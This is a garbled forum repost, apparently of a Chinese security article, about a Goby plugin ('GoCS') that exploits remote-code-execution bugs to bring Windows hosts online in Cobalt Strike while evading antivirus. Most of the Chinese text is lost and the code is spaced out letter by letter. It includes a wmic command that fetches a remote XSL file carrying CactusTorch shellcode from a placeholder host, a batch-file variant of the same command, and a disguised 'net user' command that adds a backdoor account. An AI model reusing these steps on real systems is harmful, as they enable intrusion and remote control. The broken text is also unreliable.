[17859] 2021-08-16_插件分享简单免杀绕过和利用上线的GoCS

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-08-16_插件分享简单免杀绕过和利用上线的GoCS   |   线   G o C S   h u t u t u Z h   G o b y S e c   2 0 2 1 - 0 8 - 1 6   #   , 4 G o b y 1 7   6 2 1 4         1 6   G o b y     E X P   P o C & E X P     w h o a m i     W i n d o w s   线   C S   线   C S
  0 1   使 使 1 . 1   1 . 2   使 使 1 .     C S     3 2     R A W     p a y l o a d     ( a t t a c k s   -   >   p a c k a g e s   -   >   p a y l o a d   g e n e r a t o r   -   >   o u t p u t : r a w     b i n )   V P S  
2 .     G o b y     V P S   使 3 .     G o C S 4 .   ,   p a y l o a d     G O  
    W i n d o w s     0 2   2 . 1   2 . 2     p a c k a g e . j s o n   G o P a s s . h t m l     i n d e x . h t m l     p a c k a g e . j s o n   . g i t i g n o r e                     / /   n o d e _ m o d u l e s   R E A D M E . m d                       / /     C H A N G E L O G . m d                 / /     s r c         C S . p n g                   / / C S         a s s e t s       / / l a y u i         e x t e n s i o n . j s             / /           G o p a s s . h t m l         / / x s l         G o C S . h t m l             / / 线 C S   p a c k a g e . j s o n                   / /     n o d e _ m o d u l e s             / /
2 . 3     e x t e n s i o n . j s   G o b y     G o C S     e x t e n s i o n s   ( )   l e t   f s   =   r e q u i r e ( ' f s ' )   p a r e n t     C o m m a n d     G o P a s s     G o P a s s . h t m l   E X P           / /         g o b y . r e g i s t e r C o m m a n d ( ' G o P a s s ' , f u n c t i o n ( c o n t e n t ) {                 / /                 l e t   p a t h   =   _ _ d i r n a m e   +   " / G o P a s s . h t m l "                 / /                 g o b y . s h o w I f r a m e D i a ( p a t h ,   " G o P a s s " ,   " 6 6 6 " ,   " 5 0 0 " ) ;                         } )         / /         / / G o 0 p G o b y _ e x p         / / G e x p         c l a s s   G e x p   {         / /             c o n s t r u c t o r ( )   {                 t h i s . f s   =   r e q u i r e ( ' f s ' )                 t h i s . r e q u e s t   =   r e q u i r e ( ' r e q u e s t ' )                 t h i s . p a t h   =   r e q u i r e ( ' p a t h ' )             }             / /             i n i t ( )   {                 t h i s . h o s t   =   t h i s . d a t a . s e r v e r _ h o s t ;                 t h i s . p o r t   =   t h i s . d a t a . s e r v e r _ p o r t ;                 t h i s . u s e r n a m e   =   t h i s . d a t a . a u t h U s e r n a m e ;                 t h i s . p a s s w o r d   =   t h i s . d a t a . a u t h P a s s w o r d ;               }                 / / u s e r n a m e p a s s w o r d               g e t S e r v e r I n f o ( )   {                         / /                         l e t   c o n f i g _ i n f o   =   t h i s . p a t h . j o i n ( _ _ d i r n a m e ,   ' . . / . . / . . / c o n f i g / c o n f i g . j s o n ' ) ;                                 / /                         t h i s . d a t a   =   J S O N . p a r s e ( t h i s . f s . r e a d F i l e S y n c ( c o n f i g _ i n f o ,   ' u t f - 8 ' ) ) ;
2 . 4   2 . 4 . 1   G o P a s s . h t m l     x s l     b i n     b a s e 6 4     x s l     G o P a s s . x s l   X s l   使   c a c t u s T o r c h     s h e l l c o d e   w m i c     s h e l l c o d e , 线   C S   x s l     < ! - - - - >                           t h i s . d a t a   =   J S O N . p a r s e ( t h i s . f s . r e a d F i l e S y n c ( c o n f i g _ i n f o ,   ' u t f - 8 ' ) ) ;                                 / / j s o n                         r e t u r n   t h i s . d a t a ;                 }                   / /                 g e t P O C I n f o ( v u l n a m e ,   p r o x y s t r )   {                         t h i s . i n i t ( ) ;                         / / G o b y j s o n                         r e t u r n   n e w   P r o m i s e ( ( r e s o l v e ,   r e j e c t )   = >   {                                 / /                                 t h i s . r e q u e s t ( {                                     u r l :   ` h t t p : / / $ { t h i s . h o s t } : $ { t h i s . p o r t } / a p i / v 1 / g e t P O C I n f o ` ,                                     m e t h o d :   ' P O S T ' ,                                     a u t h :   {                                         ' u s e r ' :   t h i s . u s e r n a m e ,                                         ' p a s s ' :   t h i s . p a s s w o r d ,                                     } ,                                     p r o x y :   p r o x y s t r ,                                     j s o n :   {   " v u l n a m e " :   v u l n a m e }                                   } ,   f u n c t i o n   ( e r r o r ,   r e s p o n s e ,   b o d y )   {                                           / /                                           i f   ( ! e r r o r   & &   r e s p o n s e . s t a t u s C o d e   = =   2 0 0 )   {                                                 / /                                                 r e s o l v e ( b o d y ) ;                                           }   e l s e   {                                                 / /                                                 r e j e c t ( e r r o r )                                           }                                 } ) ;                         } )                   }                         / / e x p             d e b u g E x p ( p o s t _ d a t a ,   p r o x y s t r )   {                         t h i s . i n i t ( ) ;                         / / G o b y e x p                         r e t u r n   n e w   P r o m i s e ( ( r e s o l v e ,   r e j e c t )   = >   {                                 / /                             t h i s . r e q u e s t ( {                                 u r l :   ` h t t p : / / $ { t h i s . h o s t } : $ { t h i s . p o r t } / a p i / v 1 / d e b u g E x p ` ,                                 m e t h o d :   ' P O S T ' ,                                 a u t h :   {                                     ' u s e r ' :   t h i s . u s e r n a m e ,                                     ' p a s s ' :   t h i s . p a s s w o r d ,                                 } ,                                 p r o x y :   p r o x y s t r ,                                 j s o n :   p o s t _ d a t a                             } ,   f u n c t i o n   ( e r r o r ,   r e s p o n s e ,   b o d y )   {                                 i f   ( ! e r r o r   & &   r e s p o n s e . s t a t u s C o d e   = =   2 0 0 )   {                                     / /                                     / /   c o n s o l e . l o g ( b o d y ) ;                                     r e s o l v e ( b o d y ) ;                                 }   e l s e   {                                     r e j e c t ( e r r o r )                                 }                             } ) ;                 } )             }         } / / G e x p  
  v t     < ! - - - - >     P   P   . . .  
2 . 4 . 2   i n d e x . h t m l   线 线   C S   e x t e n s i o n . j s     G e x p     P o C     E X P     R C E     u p l o a d     p h p a s p j s p (   a s p x ) 使   p a r e n t 使   e x e c     c m d     G o b y . e x e     G o b y     j s     d i v   使 使   l a y u i     s e l e c t     p h p     u p l o a d     p h p     c m d     w m i c     s h e l l c o d e R C E     d o s     w m i c     s h e l l c o d e   (   s y s t e m ( )     c m d   )   x s l   线   w m i c     w m i c     w m i c   o s   g e t   / f o r m a t : " h t t p : / / y o u r I P / a . x s l " 使   e c h o     |   e c h o   o s   g e t   / f o r m a t : " h t t p : / / y o u r I P / a . x s l " | w m i c l e t   f s   =   p a r e n t . r e q u i r e ( ' f s ' ) ; l e t   g o b y   =   p a r e n t . g o b y ;                 / / s e l e c t                 / / l a y u i s e l e c t                 l a y u i . u s e ( [ ' f o r m ' ] ,   f u n c t i o n   ( )   {                         v a r   f o r m   =   l a y u i . f o r m ;                         / /                         / / l a y u i s e l e c t l a y u i 使                         / / i d v l u l                         f o r m . o n ( ' s e l e c t ( v l u l ) ' ,   f u n c t i o n   ( d a t a )   {                                 / / t e x t a r e a                                 c h a n g e E ( ) ;                         } ) ;                         / / i d t x t                         f o r m . o n ( ' s e l e c t ( t x t ) ' ,   f u n c t i o n   ( d a t a )   {                                 / / t e x t a r e a                                 c h a n g e E ( ) ;                         } ) ;                         / /                 } ) ;                 / / s e l e c t
    c m d     U p l o a d     b a t     w m i c   b a t   w m i c     e c h o   ^ e c h o   o s   g e t   / f o r m a t : " h t t p : / / y o u r I P / a . x s l " ^ | w m i c > > 1 . b a t & & 1 . b a t   s h e l l c o d e  
  6       线   a r g u e   使 h t t p s : / / w w w . f r e e s i o n . c o m / a r t i c l e / 3 3 4 2 9 0 4 3 3 6 / #   n e t # #   n e t     P     n e t   c o m m a n d     n e t   x x x x x x x x x x 使 w m i c   a r g u e   n e t   x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x a r g u e e x e c u t e   n e t   u s e r   t e s t 2   r o o t 1 2 3   / a d d
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则